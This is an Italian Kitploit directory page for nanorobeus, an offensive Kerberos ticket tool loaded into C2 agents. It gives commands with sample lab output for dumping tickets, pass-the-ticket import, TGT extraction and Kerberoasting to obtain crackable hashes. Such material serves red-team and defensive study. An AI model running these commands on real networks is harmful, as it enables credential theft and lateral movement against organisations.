Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
nanorobeus — File COFF (BOF) per la gestione dei ticket Kerberos. | Kitploit
Strumenti/GitHubGitHub/wavvs/nanorobeus
Attacchi alle PasswordPost-ExploitAutenticazioneRed Teaming
GitHubwavvs/nanorobeus

nanorobeus

File COFF (BOF) per la gestione dei ticket Kerberos.

Vedi Repository
3283123 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Nanorobeus

File COFF (BOF) per la gestione dei ticket Kerberos.

Agent supportati

  • Sliver
  • Brute Ratel
  • Cobalt Strike

Comandi

luid - ottiene l'ID di accesso corrente

sessions [/luid:<0x0>| /all] - ottiene le sessioni di accesso

klist [/luid:<0x0> | /all] - elenca i ticket Kerberos

dump [/luid:<0x0> | /all] - esporta i ticket Kerberos

ptt /ticket:<base64> [/luid:<0x0>] - importa un ticket Kerberos in una sessione di accesso

purge [/luid:<0x0>] - rimuove i ticket Kerberos

tgtdeleg /spn:<spn> - recupera un TGT utilizzabile per l'utente corrente

kerberoast /spn:<spn> - esegue Kerberoasting sull'SPN specificato

Esempi

Ottiene l'ID di accesso corrente.

root@kitploit:~
=> nanorobeus64 luid

[+] Current LogonId: 0:0x19ea88e

Ottiene informazioni dettagliate sulla sessione di accesso corrente.

root@kitploit:~
=> nanorobeus64 sessions

UserName                : User
Domain                  : FORTRESS
LogonId                 : 0:0x19ea88e
Session                 : 2
UserSID                 : S-1-5-21-1768674056-2740991423-664180583-1105
Authentication package  : Kerberos
LogonType               : Interactive
LogonTime (UTC)         : 2/7/2022 19:22:43
LogonServer             : SERVER
LogonServerDNSDomain    : FORTRESS.LOCAL
UserPrincipalName       : [email protected]

Elenca i ticket Kerberos per la sessione di accesso corrente. Con privilegi elevati, usa /all per elencare i ticket di tutte le sessioni oppure /luid:0x0 per elencare i ticket in una sessione di accesso specifica.

root@kitploit:~
=> nanorobeus64 klist

UserName                : User
Domain                  : FORTRESS
LogonId                 : 0:0x19ea88e
Session                 : 2
UserSID                 : S-1-5-21-1768674056-2740991423-664180583-1105
Authentication package  : Kerberos
LogonType               : Interactive
LogonTime (UTC)         : 2/7/2022 19:22:43
LogonServer             : SERVER
LogonServerDNSDomain    : FORTRESS.LOCAL
UserPrincipalName       : [email protected]

[*] Cached tickets: (6)

	[0]
	Client name     : User @ FORTRESS.LOCAL
	Server name     : krbtgt/FORTRESS.LOCAL @ FORTRESS.LOCAL
	Start time      : 2/7/2022 19:22:44 (UTC)
	End time        : 3/7/2022 5:22:43 (UTC)
	Renew time      : 9/7/2022 19:22:43 (UTC)
	Flags           : forwardable, forwarded, renewable, pre_authent, name_canonicalize (0x60a10000)
	Encryption type : AES256_CTS_HMAC_SHA1
    ...(snip)...

Esporta i ticket dalla sessione di accesso corrente. Con privilegi elevati, usa /all per esportare i ticket da tutte le sessioni oppure /luid:0x0 per esportare i ticket da una sessione di accesso specifica.

root@kitploit:~
=> nanorobeus64 dump

UserName                : User
Domain                  : FORTRESS
LogonId                 : 0:0x19ea88e
Session                 : 2
UserSID                 : S-1-5-21-1768674056-2740991423-664180583-1105
Authentication package  : Kerberos
LogonType               : Interactive
LogonTime (UTC)         : 2/7/2022 19:22:43
LogonServer             : SERVER
LogonServerDNSDomain    : FORTRESS.LOCAL
UserPrincipalName       : [email protected]

[*] Cached tickets: (6)

	[0]
	Client name     : User @ FORTRESS.LOCAL
	Server name     : krbtgt/FORTRESS.LOCAL @ FORTRESS.LOCAL
	Start time      : 2/7/2022 19:22:44 (UTC)
	End time        : 3/7/2022 5:22:43 (UTC)
	Renew time      : 9/7/2022 19:22:43 (UTC)
	Flags           : forwardable, forwarded, renewable, pre_authent, name_canonicalize (0x60a10000)
	Encryption type : AES256_CTS_HMAC_SHA1
	Ticket          : doIFFjCCBRKgAwIBBaEDAgEWooIEGTCCBBVhggQRMIIEDaADAg...(snip)...

Importa un ticket nella sessione di accesso corrente. Con privilegi elevati, usa /luid:0x0 per importare il ticket in una sessione di accesso specifica.

root@kitploit:~
=> make_token network fortress.local test pass
=> nanorobeus64 ptt /ticket:doIFqjCCBaagAwIB...snip...

[+] Ticket successfully imported.

Rimuove tutti i ticket Kerberos dalla sessione di accesso corrente. Con privilegi elevati, usa /luid:0x0 per rimuovere i ticket da una sessione di accesso specifica.

root@kitploit:~
=> nanorobeus64 purge

[+] Successfully purged tickets.

Recupera un TGT utilizzabile per l'utente corrente.

root@kitploit:~
=> nanorobeus64 tgtdeleg /spn:cifs/server.fortress.local

[*] Found the AP-REQ delegation ticket in the GSS-API output
[*] Authenticator etype: AES256_CTS_HMAC_SHA1
[*] Successfully extracted the service ticket session key
[*] Successfully decrypted authenticator
[+] Successfully extracted TGT: doIFeDCCBXSgAwIBBaEDAgEWooIEcjC...(snip)...

Esegue Kerberoasting specificando l'SPN:

root@kitploit:~
=> nanorobeus64 kerberoast /spn:HTTP/server.fortress.local

[*] Target SPN: HTTP/server.fortress.local
[+] Hash: $krb5tgs$23$*$FORTRESS.LOCAL$HTTP/server.fortress.local*$ac5e2f4d28fd377...(snip)...

Crediti

  • Rubeus - https://github.com/GhostPack/Rubeus
  • mimikatz - https://github.com/gentilkiwi/mimikatz
  • kekeo - https://github.com/gentilkiwi/kekeo
Scarica lo strumento